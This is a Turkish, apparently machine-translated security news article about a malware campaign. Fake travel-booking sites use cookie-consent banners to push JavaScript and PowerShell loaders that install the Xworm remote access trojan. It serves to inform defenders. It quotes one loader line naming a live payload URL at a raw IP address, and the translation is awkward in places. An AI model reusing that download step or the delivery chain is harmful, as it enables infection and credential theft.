Sofistike bir siber suç kampanyası, Booking.com gibi meşru platformları taklit etmek için tasarlanmış titizlikle hazırlanmış sahte seyahat rezervasyonu web siteleri aracılığıyla tatil gezginlerini hedeflemeyi hedeflemiştir.
2025’in ilk çeyreğinde önemli bir ivme kazanan operasyon, siber suçlular, kötü niyetli yükler sunmak için kullanıcıların rutin web öğeleriyle alışılmış etkileşimlerini kullandıkça sosyal mühendislik taktiklerinde endişe verici bir evrimi temsil ediyor.
Kampanyanın birincil silahı, saldırganlara enfekte olmuş sistemler üzerinde kapsamlı kontrol sağlayan güçlü bir uzaktan erişim Truva atı (sıçan) olan Xworm’dur.
.png
)
Bu özel kampanyayı özellikle sinsi yapan şey, “tıklama yorgunluğu” – dikkat çekmeden çerez rızası pankartlarını hızlı bir şekilde reddetmenin ortak kullanıcı davranışıdır.
Bu her yerde bulunan GDPR uyum unsurlarını silahlandırarak, tehdit aktörleri rutin bir tarama etkileşimini kötü amaçlı yazılım dağıtım mekanizmasına dönüştürdüler.
HP Wolf Security Analistleri, bu kampanyayı, etki alanı kayıt kalıplarının analizi yoluyla erken belirledi ve 23 Şubat 2025 tarihinde aynı anda kayıtlı olarak kaydedildiğini belirtti.
Araştırmacılar, bu etkinliğin önceki sahte Captcha tabanlı kampanyalardan önemli bir ayrılmayı temsil ettiğini ve enfeksiyon oranlarını en üst düzeye çıkarmak için sosyal mühendislik metodolojilerindeki sürekli yenilikleri gösterdiğini gözlemlediler.
Bu kampanyanın finansal ve operasyonel etkisi, Xworm’un yetenekleri kapsamlı sistem keşfi, kimlik bilgisi hasadı ve kalıcı arka kapı erişimini içerdiğinden, bireysel mağdurların ötesine uzanıyor.
Kuruluşlar, çalışanların kişisel cihazları bu meşru seyahat rezervasyonu faaliyetlerinden ödün verildiğinde, kurumsal ağlardaki potansiyel veri ihlalleri, fikri mülkiyet hırsızlığı ve yanal hareketle karşı karşıyadır.
Enfeksiyon mekanizması
Saldırı, potansiyel kurbanlar meşru seyahat rezervasyon platformlarının görünümünü ve işlevselliğini yakından kopyalayan hileli web sitelerine gittiğinde başlar.
Bu sitelere eriştikten sonra, kullanıcılar çoğu İnternet kullanıcısı için ikinci doğa haline gelen tanıdık “kabul” ve “reddetme” seçenekleriyle birlikte standart bir çerez rıza afişi gibi görünen şeylerle karşılaşırlar.
Mağdurlar “Kabul” düğmesini tıkladığında, kötü amaçlı afiş ikna edici bir yükleme animasyonu görüntülerken bir JavaScript indirme başlatır.
Banner kullanıcılara, GDPR uyumluluk gereksinimleri bağlamı göz önüne alındığında makul görünen bir istek olan çerez kabul sürecini tamamlamak için indirilen dosyayı tıklamalarını söylediğinden, sosyal mühendislik bileşeni bu aşamada özellikle etkili hale gelir.
İndirilen JavaScript dosyası, meşru sistem işlemleri olarak maskelenirken arka planda iki PowerShell komut dosyası yürüterek ilk yük dağıtım mekanizması olarak hizmet eder.
Bu komut dosyaları, .mp4 dosya uzantısını, şüpheli PowerShell etkinliği için web proxy günlüklerini inceleyen güvenlik analistleri tarafından tespit etmek için tasarlanmış bir aldatma taktiği olarak akıllıca kullanır.
PowerShell yürütme zinciri, sonraki aşamalı yükü indiren bozulmuş kodda gösterildiği gibi sofistike teknik uygulama gösterir: $CNfID4AHhe = "http://185.7.214.54/js.exe" ardından sistematik .NET montaj yükleme ve yürütme prosedürleri.
Kötü amaçlı yazılım, son Xworm yükünü meşru bir msbuild.exe işlemine enjekte etmeden önce çalışma zamanında başka bir ikili derleyen bir .NET programı yükleyen karmaşık bir işlem enjeksiyon tekniği kullanır.
Bu enjeksiyon yöntemi, kötü yazılım bileşenlerini bölüme göre hedef proses bellek alanına yazarak meşru sistem süreçleri içindeki varlığını etkili bir şekilde maskelediğinden, özellikle gelişmiş bir kaçaklama tekniğini temsil eder.
İş parçacığı bağlamı manipülasyonu ve yürütme yeniden yönlendirmesi, Xworm’un kayıt defteri modifikasyonları ve başlangıç klasör girişleri yoluyla kalıcılığı korurken, tehlikeye atılan ortamda sorunsuz bir şekilde çalışmasını sağlar.
.webp)
Yukarıdaki ikna edici LURE web sitesi arayüzü, aşağıdaki şekilde bozulma JavaScript kodu yapısını ortaya koymaktadır.
.webp)
Bu, kampanyanın teknik sofistike ve sosyal mühendislik etkinliğini gösteren kötü niyetli indirme sırasını başlatır.
Herhangi biriyle tehdit tepkisini otomatikleştirin. -> Tam erişim isteyin